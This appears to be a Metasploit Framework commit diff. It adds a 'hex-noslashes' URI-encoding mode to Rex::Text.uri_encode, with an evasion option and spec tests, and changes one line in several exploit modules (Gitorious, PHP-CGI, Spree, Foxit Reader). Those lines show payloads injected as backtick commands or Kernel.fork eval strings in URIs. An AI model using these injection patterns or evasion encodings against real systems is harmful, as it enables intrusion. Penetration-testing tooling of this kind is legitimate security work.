Land rapid7#3353, @jjarmoc's Rex::Text::uri_encode improvements

Author: firefart

lib/msf/core/exploit/http/client.rb

@@ -58,7 +58,7 @@ def initialize(info = {})
 
     register_evasion_options(
       [
-        OptEnum.new('HTTP::uri_encode_mode', [false, 'Enable URI encoding', 'hex-normal', ['none', 'hex-normal', 'hex-all', 'hex-random', 'u-normal', 'u-all', 'u-random']]),
+        OptEnum.new('HTTP::uri_encode_mode', [false, 'Enable URI encoding', 'hex-normal', ['none', 'hex-normal', 'hex-noslashes', 'hex-random', 'hex-all', 'u-normal', 'u-all', 'u-random']]),
         OptBool.new('HTTP::uri_full_url', [false, 'Use the full URL for all HTTP requests', false]),
         OptInt.new('HTTP::pad_method_uri_count', [false, 'How many whitespace characters to use between the method and uri', 1]),
         OptInt.new('HTTP::pad_uri_version_count', [false, 'How many whitespace characters to use between the uri and version', 1]),

lib/rex/proto/http/client_request.rb

@@ -40,7 +40,7 @@ class ClientRequest
     #
     'encode_params'          => true,
     'encode'                 => false,
-    'uri_encode_mode'        => 'hex-normal', # hex-all, hex-random, u-normal, u-random, u-all
+    'uri_encode_mode'        => 'hex-normal', # hex-all, hex-noslashes, hex-random, u-all, u-noslashes, u-random
     'uri_encode_count'       => 1,       # integer
     'uri_full_url'           => false,   # bool
     'pad_method_uri_count'   => 1,       # integer

lib/rex/text.rb

@@ -788,15 +788,18 @@ def self.uri_encode(str, mode = 'hex-normal')
 
     return str if mode == 'none' # fast track no encoding
 
-    all = /[^\/\\]+/
+    all = /./
+    noslashes = /[^\/\\]+/
     # http://tools.ietf.org/html/rfc3986#section-2.3
     normal = /[^a-zA-Z0-9\/\\\.\-_~]+/
 
     case mode
-    when 'hex-normal'
-      return str.gsub(normal) { |s| Rex::Text.to_hex(s, '%') }
     when 'hex-all'
       return str.gsub(all) { |s| Rex::Text.to_hex(s, '%') }
+    when 'hex-normal'
+      return str.gsub(normal) { |s| Rex::Text.to_hex(s, '%') }
+    when 'hex-noslashes'
+      return str.gsub(noslashes) { |s| Rex::Text.to_hex(s, '%') }
     when 'hex-random'
       res = ''
       str.each_byte do |c|
@@ -806,10 +809,12 @@ def self.uri_encode(str, mode = 'hex-normal')
           b.gsub(normal){ |s| Rex::Text.to_hex(s, '%') } )
       end
       return res
-    when 'u-normal'
-      return str.gsub(normal) { |s| Rex::Text.to_hex(Rex::Text.to_unicode(s, 'uhwtfms'), '%u', 2) }
     when 'u-all'
       return str.gsub(all) { |s| Rex::Text.to_hex(Rex::Text.to_unicode(s, 'uhwtfms'), '%u', 2) }
+    when 'u-normal'
+      return str.gsub(normal) { |s| Rex::Text.to_hex(Rex::Text.to_unicode(s, 'uhwtfms'), '%u', 2) }
+    when 'u-noslashes'
+      return str.gsub(noslashes) { |s| Rex::Text.to_hex(Rex::Text.to_unicode(s, 'uhwtfms'), '%u', 2) }
     when 'u-random'
       res = ''
       str.each_byte do |c|

modules/exploits/multi/http/gitorious_graph.rb

@@ -55,7 +55,7 @@ def exploit
     # Make sure the URI begins with a slash
     uri = normalize_uri(datastore['URI'])
 
-    command = Rex::Text.uri_encode(payload.raw, 'hex-all')
+    command = Rex::Text.uri_encode(payload.raw, 'hex-noslashes')
     command.gsub!("%20","%2520")
     res = send_request_cgi({
       'uri'     => "/api"+ uri + "/log/graph/%60#{command}%60",

modules/exploits/multi/http/php_cgi_arg_injection.rb

@@ -196,7 +196,7 @@ def rand_encode(string, max = string.length)
         max.times { chars << rand(string.length)}
       end
     end
-    chars.uniq.sort.reverse.each{|index|  string[index] = Rex::Text.uri_encode(string[index,1], "hex-all")}
+    chars.uniq.sort.reverse.each{|index|  string[index] = Rex::Text.uri_encode(string[index,1], "hex-noslashes")}
     string
   end
 

modules/exploits/multi/http/spree_search_exec.rb

@@ -51,7 +51,7 @@ def initialize(info = {})
   end
 
   def exploit
-    command = Rex::Text.uri_encode(payload.raw, 'hex-all')
+    command = Rex::Text.uri_encode(payload.raw, 'hex-noslashes')
     res = send_request_raw({
       'uri'     => normalize_uri(datastore['URI']) + "?search[send][]=eval&search[send][]=Kernel.fork%20do%60#{command}%60end",
       'method'  => 'GET',

modules/exploits/multi/http/spree_searchlogic_exec.rb

@@ -53,7 +53,7 @@ def initialize(info = {})
   end
 
   def exploit
-    command = Rex::Text.uri_encode(payload.raw, 'hex-all')
+    command = Rex::Text.uri_encode(payload.raw, 'hex-noslashes')
 
     urlconfigdir = normalize_uri(datastore['URI']) + '/' + "api/orders.json?search[instance_eval]=Kernel.fork%20do%60#{command}%60end"
     res = send_request_raw({

modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb

@@ -182,7 +182,7 @@ def on_request_uri(cli, request)
       sploit << self.send(my_target[:rop])
       sploit << p.encoded
 
-      resp['Location'] = request.uri + '.pdf?' + Rex::Text.uri_encode(sploit, 'hex-all')
+      resp['Location'] = request.uri + '.pdf?' + Rex::Text.uri_encode(sploit, 'hex-noslashes')
       cli.send_response(resp)
 
       # handle the payload

spec/lib/rex/proto/http/client_request_spec.rb

@@ -189,6 +189,7 @@
         'foo[]'      => 'bar',
         'bar'        => 'baz',
         'frobnicate' => 'the froozle?',
+        'foshizzle'  => 'my/nizzle',
       }
     end
 
@@ -215,6 +216,7 @@
         str.should include("foo[]=bar")
         str.should include("bar=baz")
         str.should include("frobnicate=the froozle?")
+        str.should include("foshizzle=my/nizzle")
       end
     end
 
@@ -226,6 +228,18 @@
           str.should include("foo%5b%5d=bar")
           str.should include("bar=baz")
           str.should include("frobnicate=the%20froozle%3f")
+          str.should include("foshizzle=my/nizzle")
+        end
+      end
+
+      context "and 'uri_encode_mode' = hex-noslashes" do
+        let(:encode_mode) { 'hex-noslashes' }
+        it "should encode all chars" do
+          str = client_request.to_s
+          str.should include("%66%6f%6f%5b%5d=%62%61%72")
+          str.should include("%62%61%72=%62%61%7a")
+          str.should include("%66%72%6f%62%6e%69%63%61%74%65=%74%68%65%20%66%72%6f%6f%7a%6c%65%3f")
+          str.should include("%66%6f%73%68%69%7a%7a%6c%65=%6d%79/%6e%69%7a%7a%6c%65")
         end
       end
 
@@ -236,6 +250,7 @@
           str.should include("%66%6f%6f%5b%5d=%62%61%72")
           str.should include("%62%61%72=%62%61%7a")
           str.should include("%66%72%6f%62%6e%69%63%61%74%65=%74%68%65%20%66%72%6f%6f%7a%6c%65%3f")
+          str.should include("%66%6f%73%68%69%7a%7a%6c%65=%6d%79%2f%6e%69%7a%7a%6c%65")
         end
       end